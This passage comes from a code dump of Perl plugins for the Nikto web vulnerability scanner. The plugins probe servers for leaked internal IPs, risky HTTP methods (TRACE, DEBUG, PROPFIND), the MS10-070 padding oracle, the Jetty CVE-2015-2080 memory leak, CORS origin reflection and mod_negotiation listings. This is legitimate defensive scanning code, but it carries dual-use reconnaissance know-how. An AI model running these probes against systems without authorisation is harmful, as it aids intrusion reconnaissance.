x-dmuser x-gallery-version x-hosted-at x-hostname x-isp x-powered-by x-responding-server x-served-by x-server x-server-name x-webserver x-owa-version access-control-allow-origin x-application-context cneonction nncoection xxx-real-ip bae-env-addr-sql-ip bae-env-addr-sql-port cf-connecting-ip fastly-client-ip incap-client-ip real-ip rlnclientipaddr true-client-ip x-clientip x-client-ip x-cluster-client-ip  x-ip x-nokia-ipaddress x-real-ip x-wap-network-client-ip reason-code/;\n\n    foreach my $header (@interesting_headers) {\n    \tif (exists $result->{$header}) {\n        my $key = LW2::md5(  $mark->{'ip'}\n                   . $mark->{'hostname'}\n                   . $mark->{'port'}\n                   . $mark->{'ssl'}\n                   . $result->{'whisker'}->{'method'}\n                   . $header);\n\n       \tif (!exists $HFOUND{$key}) {\n            my $value = \"\";\n            if (ref($result->{$header}) eq ARRAY) {\n            \t$value = join(', ', @{ $result->{$header} });\n              \t}\n            else {\n              \t$value = $result->{$header};\n              \t}\n            $HFOUND{$key} = $value;\n            add_vulnerability($mark, \"Retrieved $header header: $value\", $tid, \"0\", $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n       \t}\n    }\n  }\n}\n\nsub nikto_headers {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n\n    #######################################################################\n    # look for to see whether its vulnerable to the Translate: f\n    my %transheaders;\n    $transheaders{'Translate'} = \"f\";\n    foreach\n      my $f (qw/\\/index.asp \\/junk999.asp \\/index.aspx \\/junk988.aspx \\/login.asp \\/login.aspx/) {\n        return if $mark->{'terminate'};\n        my ($res, $content, $error, $request, $result) =\n          nfetch($mark, $f, \"GET\", \"\", \"\", \"\", \"headers: Translate-f #1\");\n        if ($res eq \"200\") {\n            ($res, $content, $error, $request, $result) =\n              nfetch($mark, $f . \"\\\\\", \"GET\", \"\", \\%transheaders, \"\", \"headers: Translate-f #2\");\n            if ($res eq \"200\") {\n                if ($content =~ /<asp:/ || $content =~ /<\\/asp:/) {\n                    add_vulnerability( $mark, \"Host may be vulnerable to a source disclosure using the Translate: header\", 999983, 390, \"GET\", $f, $request, $result);\n                    last;\n                }\n            }\n        }\n    }\n\n    #######################################################################\n    # Content-Location header in IIS\n    my (%locheaders, %locflags, $cl, $l, $wa);\n    $locheaders{'User-Agent'} = $VARIABLES{'useragent'};\n    $locheaders{'User-Agent'} =~ s/\\@TESTID/headers:\\ IIS\\ internal\\ IP/;\n    $locflags{'noclean'} = 1;\n    $locflags{'nohost'}  = 1;\n    $cl = $l = $wa = $rt = 0;\n\n    foreach my $uri ('/',                              '/images',\n                     '/Autodiscover/Autodiscover.xml', '/Autodiscover/',\n                     '/Microsoft-Server-ActiveSync',   '/Microsoft-Server-ActiveSync/default.css',\n                     '/ECP',                           '/EWS',\n                     '/EWS/Exchange.asmx',             '/Exchange',\n                     '/OWA',                           '/Microsoft-Server-ActiveSync/default.eas',\n                     '/Rpc',                           '/EWS/Services.wsdl',\n                     '/ecp',                           '/OAB',\n                     '/aspnet_client',                 '/PowerShell'\n                     ) {\n        my ($res, $content, $errors, $request, $result) =\n          nfetch($mark, $uri, \"GET\", \"\", \\%locheaders, \\%locflags, \"headers: HTTP 1.0 internal IP\", \"1.0\");\n\n        if (!$cl && ($result->{'content-location'} ne \"\")) {\n\t\tmy @ips=get_ips($result->{'content-location'});\n        \tmy ($valid, $internal, $loopback) = is_ip($ips[0]);\n\t\tif (($ips[0] ne '') && ($ips[0] ne $mark->{'ip'})) {\n            \t\t$cl = 1;\n            \t\tadd_vulnerability( $mark,\n                \t\"IIS may reveal its internal or real IP in the Content-Location header via a request to $uri over HTTP/1.0. The value is \\\"$ips[0]\\\".\",\n                \t999989, 630, \"GET\", $uri, $request, $result);\n        \t\t}\n\t\t}\n\n        if (!$l && ($result->{'location'} ne \"\")) {\n                my @ips=get_ips($result->{'location'});\n                my ($valid, $internal, $loopback) = is_ip($ips[0]);\n                if (($ips[0] ne '') && ($ips[0] ne $mark->{'ip'})) {\n                        $l = 1;\n                        add_vulnerability( $mark,\n                        \"The web server may reveal its internal or real IP in the Location header via a request to $uri over HTTP/1.0. The value is \\\"$ips[0]\\\".\",\n                        999988, 630, \"GET\", $uri, $request, $result);\n                        }\n                }\n\n        if (!$wa && ($result->{'www-authenticate'} ne \"\")) {\n                my @ips=get_ips($result->{'www-authenticate'});\n                my ($valid, $internal, $loopback) = is_ip($ips[0]);\n                if (($ips[0] ne '') && ($ips[0] ne $mark->{'ip'})) {\n                        $wa = 1;\n                        add_vulnerability( $mark,\n                \t\"Microsoft Exchange Systems (CAS and OWA) may reveal the internal or real IP in the WWW-Authenticate header via a request to $uri over HTTP/1.0. The value is \\\"$ips[0]\\\".\",\n                        999986, 630, \"GET\", $uri, $request, $result);\n                        }\n                }\n\n        if (!$rt && ($result->{'report-to'} ne \"\")) {\n        \tmy @bits = split(\"url\\\": \\\"\", $result->{'report-to'});\n\t\t    my $have = 0;\n            my @urls;\n        \tforeach my $b (@bits) {\n                \tnext if $b !~ /^http/;\n                \t$b =~ s/\\\".*$//;\n        \t\t\tif ($b ne \"\") {\n                        push(@urls, $b);\n\t\t\t        \t$have = $rt = 1;\n\t\t\t\t        }\n        \t\t    }\n\t\tif ($have) {\n\t\t\tadd_vulnerability( $mark, \"A report-to header was found with the following URLs: \" . join(\", \", @urls), 999945, 630, \"GET\", $uri, $request, $result);\n\t\t\t}\n\t\t}\n\n        if ($cl && $l && $wa && $rt) { last; }\n        }\n\n    #######################################################################\n    # Location header in WebLogic\n    # Clear out locheaders\n    for (keys %locheaders) {\n        delete $locheaders{$_};\n    }\n    $locheaders{'User-Agent'} = $VARIABLES{'useragent'};\n    $locheaders{'User-Agent'} =~ s/\\@TESTID/headers:\\ WebLogic\\ internal\\ IP/;\n\n    ($res, $content, $errors, $request, $result) =\n      nfetch($mark, '.', \"GET\", \"\", \\%locheaders, \\%flags, \"headers: WebLogic internal IP\", \"1.0\");\n\n    my @ips = get_ips($result->{'location'});\n    if ($ips[0] ne '') {\n        my ($valid, $internal, $loopback) = is_ip($ips[0]);\n        if ($valid && !$loopback && ($ips[0] ne $mark->{'ip'})) {\n            my $msg = \"WebLogic may reveal \";\n            if   ($internal) { $msg .= \"an RFC-1918 IP address. \"; }\n            else             { $msg .= \"a different IP address in the Location header.\"; }\n            $msg .= \"The IP is \\\"$ips[0]\\\".\";\n            add_vulnerability($mark, $msg, 999987, 5737, \"GET\", \".\", $request, $result);\n        }\n    }\n\n    for (keys %locheaders) {\n        delete $locheaders{$_};\n    }\n\n    # BREACH Checks\n    $locheaders{'Accept-Encoding'} = \"deflate, gzip\";\n    ($res, $content, $errors, $request, $result) =\n      nfetch($mark, '/', \"GET\", \"\", \\%locheaders, \\%flags, \"headers: BREACH Test\", \"1.1\");\n\n    if (!$BREACH && defined $result && $mark->{'ssl'}) {\n        if (defined $result->{'content-encoding'}) {\n            if ($result->{'content-encoding'} =~ \"(deflate|gzip)\") {\n                $BREACH = 1;\n                add_vulnerability( $mark, \"The Content-Encoding header is set to \\\"deflate\\\" this may mean that the server is vulnerable to the BREACH attack.\",\n                    999966, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $result);\n            }\n        }\n    }\n\n    # Jetty CVE-2015-2080\n    for (keys %locheaders) {\n        delete $locheaders{$_};\n    }\n    $locheaders{'User-Agent'} = $VARIABLES{'useragent'};\n    $locheaders{'Nikto'}      = \"\\x1f\";\n\n    ($res, $content, $errors, $request, $result) =\n      nfetch($mark, '/', \"GET\", \"\", \\%locheaders, \\%flags, \"headers: Jetty CVE-2015-2080\", \"1.0\");\n\n    if (($res eq \"400\") && ($result->{'whisker'}->{'message'} =~ /x1f<<</)) {\n        add_vulnerability( $mark, \"Jetty > 9.2.3 and < 9.2.9 may reveal the contents of internal memory if illegal characters are passed.\",\n            999976, 0, \"GET\", \".\", $request, $result);\n    }\n}\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_httpoptions.plugin",
    "content": "#VERSION,2.10\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# HTTP options check\n###############################################################################\nsub nikto_httpoptions_init {\n    my $id = { name      => \"httpoptions\",\n               full_name => \"HTTP Options\",\n               author    => \"Sullo\",\n               description =>\n                 \"Performs a variety of checks against the HTTP options returned from the server.\",\n               hooks => { scan => { method => \\&nikto_httpoptions,\n                                    weight => 20,\n                                    },\n                            },\n               copyright => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\n# This just gets the HTTP options & checks 'em out.\n# See RFC 2626 for more info...\n\nsub nikto_httpoptions {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n    my (%request, %response, $res, $dbarray, $txt, $allow_methods, $public_methods);\n\tmy $junkmethodresp;\n    $txt = \"\";\n\n    # test for both OPTIONS / and OPTIONS * as they may give different results\n    my ($res, $content, $errors, $request, $response) = nfetch($mark, \"*\", \"OPTIONS\", \"\", \"\", \"\", \"httpoptions: OPTIONS *\");\n\n    my $aoptions = \"$response->{'allow'}, \";\n    my $poptions = \"$response->{'public'}, \";\n    $dbarray = init_db(\"db_httpoptions\");\n\n    ($res, $content, $errors, $request, $response) = nfetch($mark, \"/\", \"OPTIONS\", \"\", \"\", \"\", \"httpoptions: OPTIONS /\");\n    $aoptions .= $response->{'allow'};\n    $poptions .= $response->{'public'};\n\n    # Odd case here, but maybe... http://zacstewart.com/2012/04/14/http-options-method.html\n    # lots of FP on this one; disabling for now\n    #if (($content ne '') && ($res !~ /^3\\d\\d$/)) {\n    #    add_vulnerability($mark, \"Response body of OPTIONS / request is not empty--this may describe additional REST/API services\", 999980, 0, \"OPTIONS\", \"/\", $request, $response);\n    #\t}\n\n    foreach my $o (split(/,[ ]?/, $aoptions)) {\n        $allow_methods .= \", $o\" unless ($allow_methods =~ /\\b$o\\b/ || $o eq '');\n    }\n\n    $allow_methods =~ s/^[ ]?, //;\n    foreach my $o (split(/,[ ]?/, $poptions)) {\n        $public_methods .= \", $o\" unless ($public_methods =~ /\\b$o\\b/ || $o eq '');\n    }\n    $public_methods =~ s/^[ ]?, //;\n\n    # proxy can impose its methods... should actually check this not just warn\n    if ($CLI{'useproxy'} ne \"\") { $txt = \"(May be proxy's methods, not server's)\"; }\n\n    %davmethods = ();\n    if ($allow_methods ne \"\") {\n        add_vulnerability($mark, \"Allowed HTTP Methods: $allow_methods $txt\", 999990, 0, \"OPTIONS\", \"/\", $request, $response);\n        foreach my $m (split /,? /, $allow_methods) {\n            my $method = eval_methods($m, \"Allow\", $dbarray, $mark);\n            if ($method ne \"\") { $davmethods{$method} = 1 }\n        }\n    }\n\n    if ($public_methods ne \"\") {\n        add_vulnerability($mark, \"Public HTTP Methods: $public_methods $txt\", 999985, 0, \"OPTIONS\", \"/\", $request, $response);\n        foreach my $m (split /,? /, $public_methods) {\n            my $method = eval_methods($m, \"Public\", $dbarray, $mark);\n            if ($method ne \"\") { $davmethods{$method} = 1 }\n        }\n    }\n\n    if (scalar(keys(%davmethods)) > 0) {\n        $message = \"WebDAV enabled (\";\n        for my $key (keys %davmethods) {\n            $message .= \"$key \";\n        }\n        $message .= \"listed as allowed)\";\n        add_vulnerability($mark, $message, 999977, 0, \"OPTIONS\", \"/\", $request, $response);\n    }\n\n    # Check to see what the web server does on out of standard headers\n\tmy $junkmethod=LW2::utils_randstr(8,'ABCDEFGHIJKLMNOPQRSTUVWXYZ');\n    ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", $junkmethod, \"\", \"\", \"\", \"httpoptions: Junk HTTP method\");\n\tif ($res == 200) {\n\t\tadd_vulnerability($mark, \"Web Server returns a valid response with junk HTTP methods, this may cause false positives.\", 999967, 0, $junkmethod, '/', $request, $response);\n\t\t$junkmethodresp=LW2::md5($content);\n\t}\n\n    # Check for other weirdness\n    # IIS Debug\n    return if $mark->{'terminate'};\n    ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", \"DEBUG\", \"\", \"\", \"\", \"httpoptions: DEBUG\");\n    if ($res == 200 && (LW2::md5($content) ne $junkmethodresp)) {\n        add_vulnerability($mark, \"DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.\", 999972, 0, \"DEBUG\", '/', $request, $response);\n    }\n\n    # IIS PROPFIND HEADER\n    return if $mark->{'terminate'};\n    my %headers = (\"Host\"           => \"\",\n                \"Content-Length\" => \"0\",);\n    ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", \"PROPFIND\", \"\", \\%headers, { noclean => 1 }, \"httpoptions: PROPFIND\");\n    if ($res == 207) {\n        if ($content =~ \"<a:href>https?://\") {\n            my $ipfound = $content;\n            $ipfound =~ s/^.*<a:href>//g;\n            $ipfound =~ s/<\\/a:href>.*$//g;\n            add_vulnerability($mark, \"PROPFIND HTTP verb may show the server's internal IP address: $ipfound\", 999973, 13431, \"PROPFIND\", \"/\", $request, $response);\n        }\n    }\n\n    # Special checks for TRACE/TRACK to see whether its vulnerable\n    %headers = (\"Trace-Test\" => \"Nikto\");\n    foreach my $method (split(/ /, \"TRACE TRACK\")) {\n\n        # Check for all flavours of HTTP\n        foreach my $version (split(/ /, \"1.0 1.1\")) {\n            return if $mark->{'terminate'};\n            ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", $method, \"\", \\%headers, \"\", \"httpoptions: $method\", $version);\n            if ($res == 200) {\n                if ($content =~ /Trace-Test: Nikto/) {\n                    add_vulnerability($mark, \"HTTP $method method is active, suggesting the host is vulnerable to XST\", 999971, 877, $method, \"/\", $request, $response);\n\n                    # now we know its vulnerable stop testing\n                    last;\n                }\n            }\n        }\n    }\n\n    # Now release memory for the dbarray\n    undef @$dbarray;\n    return;\n}\n\nsub eval_methods {\n    my $method  = $_[0] || return;\n    my $type    = $_[1];\n    my $dbarray = $_[2];\n    my $mark    = $_[3];\n    my $message;\n    $method = uc($method);\n\n    # Now search database for the method.\n    foreach my $item (@$dbarray) {\n        if (   $method eq \"PROPPATCH\"\n            || $method eq \"SEARCH\"\n            || $method eq \"PROPFIND\"\n            || $method eq \"COPY\"\n            || $method eq \"LOCK\"\n            || $method eq \"UNLOCK\") {\n            return $method;\n        }\n\n        if ($item->{'method'} eq $method) {\n            if ($item->{'nikto_id'} eq \"0\") {\n\n                # is webdav\n                return $method;\n            }\n            else {\n                $message = $item->{'message'};\n                $message =~ s/\\@TYPE\\@/$type/;\n                add_vulnerability($mark, \"$message\", $item->{'nikto_id'}, $item->{'osvdb'});\n            }\n        }\n    }\n\n    return \"\";\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_ms10_070.plugin",
    "content": "#VERSION,1.00\n###############################################################################\n#  Copyright (C) 2013 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Determine if site is vulnerable to MS10-070\n###############################################################################\nuse vars qw/%MS10070/;\n\nsub nikto_ms10_070_init {\n    my $id = { name        => \"ms10_070\",\n               full_name   => \"ms10-070 Check\",\n               author      => \"Sullo\",\n               description => \"Determine if a site is vulnerable to ms10-070\",\n               hooks       => {\n                          postfetch => { method => \\&nikto_ms10_070,\n                                         weight => 20,\n                                         },\n                            },\n               copyright => \"2013 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_ms10_070 {\n    return if $mark->{'terminate'};\n    my ($mark, $parameters, $request, $response) = @_;\n    return if $mark->{'ms100707'};\n    my $method = $response->{'whisker'}->{'method'} || \"GET\";\n\n   while ($response->{'whisker'}->{'data'} =~ /\\.axd\\?d=([^\\?;&\\s\"']+)/ig) {\n    \treturn if $mark->{'terminate'};\n \tmy $string = $1;\n\tnext if $MS10070{$string};\n\t$MS10070{$string}=1;\n \t$string =~ s/\\-/\\+/g;\n \t$string =~ s/\\_/\\//g;\n\tnext if $string eq '';\n \tmy $count = chop($string);\n \t$string = $string . (\"=\" x int($count));\n\t$string = LW2::decode_base64($string);\n\tif ((length($string) % 8) == 0) {\n\t\t$mark->{'ms100707'}=1;\n        \tadd_vulnerability($mark, \"Server may be vulnerable to MS10-070 (based on numeric calculation), thus allowing a cryptographic padding oracle. This vulnerability must be manually validated. See http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html\", 999959, 68127, $method, $response->{'whisker'}->{'uri'}, $request, $response);\n        \t}\n\t}\n\n    return $request, $response;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_msgs.plugin",
    "content": "#VERSION,2.07\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Various messages relating to the server banner\n###############################################################################\n# NOTES:\n# versions are loaded from the \"db_server_msgs\" file, which should be in the\n# plugins directory this plugin checks the server version to see if there are\n# any version specific items in the db_server_msgs this differs from\n# nikto_outdated because that is ONLY checking to see if it is an old version,\n# whereas this checks to see if the versions match\n###############################################################################\nsub nikto_msgs_init {\n    my $id = { name        => \"msgs\",\n               full_name   => \"Server Messages\",\n               author      => \"Sullo\",\n               description => \"Checks the server version against known issues.\",\n               hooks       => {\n                          scan => { method => \\&nikto_msgs,\n                                    weight => 20,\n                                    },\n                            },\n               copyright => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_msgs {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n    my $dbarray;\n    $dbarray = init_db(\"db_server_msgs\");\n\n    foreach my $item (@$dbarray) {\n        $item->{'server'} = validate_and_fix_regex($item->{'server'});\n        if ($mark->{'banner'} =~ /($item->{'server'})\\b/i) {\n            add_vulnerability($mark, \"$1 - $item->{'message'}\", $item->{'nikto_id'}, $item->{'osvdb'});\n        }\n    }\n\n    # Special stuff to pull information from results\n    # McAfee ePO\n    if ($mark->{'banner'} =~ /Agent-ListenServer-HttpSvr\\/1\\.0\\b/i) {\n        my ($res, $content, $error, $request, $response) = nfetch($mark, \"/_LOGFILENAME_\", \"GET\", \"\", \"\", \"\", \"msgs: Agent-ListenServer-HttpSvr\");\n        next unless ($res== 200);\n\n        # Computer name\n        return if $mark->{'terminate'};\n\tif ($content=~ /ComputerName/) {\n        \tmy $name = $content;\n        \t$name =~ s#(^.*<ComputerName>)([^<]+)(</ComputerName>.*$)#$2#;\n        \tmy $eposerver = $content;\n        \t$eposerver =~ s#(^.*<ePOServerName>)([^<]+)(</ePOServerName>.*$)#$2#;\n        \tadd_vulnerability( $mark, \"Web server is a McAfee ePO agent, showing the hostname as '$name' and the ePO server(s) as '$eposerver'.\", 980100, 0, \"GET\", \"/_LOGFILENAME_\", $request, $response);\n\t\t}\n \telse {\n        \tadd_vulnerability($mark, \"Web server is a McAfee ePO agent.\", 980100, 0, \"GET\", \"/_LOGFILENAME_\", $request, $response);\n\t\t}\n    }\n\n    # HP WBEM\n    if ($mark->{'banner'} =~ /CompaqHTTPServer/i) {\n        ($res, $content, $error, $request, $response) = nfetch($mark, \"/cpqlogin.htm\", \"GET\", \"\", \"\", \"\", \"msgs: CompaqHTTPServer\");\n        next unless ($res == 200);\n        return if $mark->{'terminate'};\n        my $ipaddrs = \"\";\n        my $name;\n        foreach my $line (split(/\\n/, $content)) {\n            if ($line =~ \"System Management Homepage for \") {\n                $name = $line;\n                $name =~ s#(^.*System Management Homepage for )([a-zA-Z0-9]*)(</font>.*$)#$2#;\n            }\n            if ($line =~ \"new ObjectIpAddresses\") {\n                my $ipaddr = $line;\n                $ipaddr =~ s#(^.*new ObjectIpAddresses\\(\")([\\d\\.]+)(\"\\);.*$)#$2#;\n                nprint(\"$ipaddr\");\n                $ipaddrs .= \" $ipaddr\";\n            }\n        }\n        add_vulnerability($mark, \"Web server is an HP WBEM agent, showing the hostname is $name and the IP addresses are$ipaddrs.\", 80101, 0, \"GET\", \"/cpqlogin.htm\", $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_multiple_index.plugin",
    "content": "#VERSION,2.03\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Look for multiple unique index files\n###############################################################################\nsub nikto_multiple_index_init {\n    my $id = { name        => \"multiple_index\",\n               full_name   => \"Multiple Index\",\n               author      => \"Tautology\",\n               description => \"Checks for multiple index files\",\n               hooks       => { scan => { method => \\&nikto_multiple_index, }, },\n               copyright   => \"2009 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_multiple_index {\n    my ($mark) = @_;\n    my $dbarray = init_db(\"db_multiple_index\");\n    my ($found, $hashes);\n    foreach my $item (@$dbarray) {\n        return if $mark->{'terminate'};\n\n        # First we need to mangle the host.\n        my ($res, $content, $error, $request, $response) = nfetch($mark, \"/$item->{'index'}\", \"GET\", \"\", \"\", \"\", \"multiple_index\");\n\n        if ($res == 200) {\n            $content = rm_active_content($content, \"$mark->{'root'}/$item->{'index'}\");\n            my $hash = LW2::md5($content);\n            $found{ \"$mark->{'root'}/$item->{'index'}\" } = $hash;\n            $hashes{$hash}++;\n        }\n\n    }    # End foreach\n\n    if (keys(%found) > 1) {\n\n        # make sure we have unique pages\n        $total_unique = 0;\n        foreach my $hash (keys %hashes) {\n            if ($hashes{$hash} eq 1) {\n                $total_unique++;\n            }\n        }\n\n        # one unique hash... bogus responses\n        if ($total_unique <= 1) {\n            return;\n        }\n\n        my $tempstring;\n        foreach my $f (keys %found) { $tempstring .= \"$f, \"; }\n        $tempstring =~ s/, ?$//;\n\n        # some unique... report slightly differently\n        if ($total_unique < keys(%found)) {\n            add_vulnerability($mark, \"Multiple index files found (note, these may not all be unique): $tempstring\", 740000, 0, \"GET\", \"/\", $request, $response);\n        }\n\n        # all unique... report\n        if ($total_unique eq keys(%found)) {\n            add_vulnerability($mark, \"Multiple index files found: $tempstring\", 740000, 0, \"GET\", \"/\", $request, $response);\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_negotiate.plugin",
    "content": "#VERSION,2.00\n###############################################################################\n#  Copyright (C) 2013 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for mod_negotiation indexing\n###############################################################################\n\nsub nikto_negotiate_init {\n    my $id = { name        => \"negotiate\",\n               full_name   => \"Negotiate\",\n               author      => \"Sullo\",\n               description => \"Checks the mod_negotiation MultiViews.\",\n               copyright   => \"2013 Chris Sullo\",\n               hooks       => {\n                          scan  => { method => \\&nikto_negotiate, },\n                          },\n                 };\n    return $id;\n}\n\nsub nikto_negotiate {\n    return if $mark->{'terminate'};\n    my ($mark) = @_;\n    my %headers = ('Accept', 'application/whatever; q=1.0');\n\n    my ($res, $content, $error, $request, $response) = nfetch($mark, \"/index\", \"GET\", \"\", \\%headers, \"\", \"negotiate\");\n\n    if ($response->{'alternates'} =~ /\\{\\\"/)  {\n\tmy $message = \"Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: \";\n\tmy @alts = split(/,/, $response->{'alternates'});\n\tforeach my $h (@alts) {\n\t\t$h =~ /\\s?\\{\"([^\"]+)\"/;\n\t\t$message .= $1 .\", \";\n\t\t}\n\t$message =~ s/, $//;\n\n        add_vulnerability($mark, $message, 999965, 0, GET, \"/index\", $request, $response);\n    }\n\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_origin_reflection.plugin",
    "content": "#VERSION,2.01\n###############################################################################\n#  Copyright (C) 2017 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for CORS reflection attacks as described in https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n###############################################################################\nsub nikto_origin_reflection_init {\n    my $id = {\n        name        => \"origin_reflection\",\n        full_name   => \"CORS Origin Reflection\",\n        author      => \"ss23\",\n        description => \"Check whether a given Origin header is reflected back in a Access-Control-Allow-Origin header\",\n        hooks       => {\n                   scan      => { method => \\&nikto_origin_reflection, },\n                   },\n        copyright => \"2017 Chris Sullo\"\n        };\n    return $id;\n}\n\nsub nikto_origin_reflection {\n    my ($mark, $parameters) = @_;\n    my %headers;\n\n    $headers{'Origin'} = 'nikto.example.com';\n\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \\%headers, \"\", \"origin_reflection\");\n    if ($response->{'Access-Control-Allow-Origin'} =~ /nikto\\.example\\.com/) {\n        add_vulnerability($mark, \"$path: Site reflects arbitrary CORS Origin headers without validation. See http://ejj.io/misconfigured-cors/\", \"000429\", 0, \"GET\", $path, $request, $response);\n    }\n\n\n    $headers{'Origin'} = $mark{'hostname'} . '.example.com';\n\n    ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \\%headers, \"\", \"origin_reflection\");\n    if ($response->{'Access-Control-Allow-Origin'} =~ /$mark{'hostname'}\\.example\\.com/) {\n        add_vulnerability($mark, \"$path: Site reflects CORS Origin headers which partially match the domain, without full validation. See http://ejj.io/misconfigured-cors/\", \"000429\", 0, \"GET\", $path, $request, $response);\n    }\n\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_outdated.plugin",
    "content": "#VERSION,2.09\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for outdated items in banner\n###############################################################################\nsub nikto_outdated_init {\n    my $id = { name        => \"outdated\",\n               full_name   => \"Outdated\",\n               author      => \"Sullo\",\n               description => \"Checks to see whether the web server is the latest version.\",\n               copyright   => \"2008 Chris Sullo\",\n               hooks       => { scan => { method => \\&nikto_outdated, }, },\n               };\n    return $id;\n}\n\nsub nikto_outdated {\n    my ($mark) = @_;\n    return if $mark->{'terminate'};\n\n    # Process banner to populate @BUILDITEMS for later eval\n\n    # If banner has nothing that can be a version... return\n    if ($mark->{'banner'} !~ /(?:\\d|\\/|\\.)/) { return; }\n\n    # If Apache, split on space...\n    elsif (   ($mark->{'banner'} =~ /apache/i)\n           || (($mark->{'banner'} =~ /\\s/) && ($mark->{'banner'} =~ /\\//))) {\n        foreach my $item (split(/ /, $mark->{'banner'})) {\n            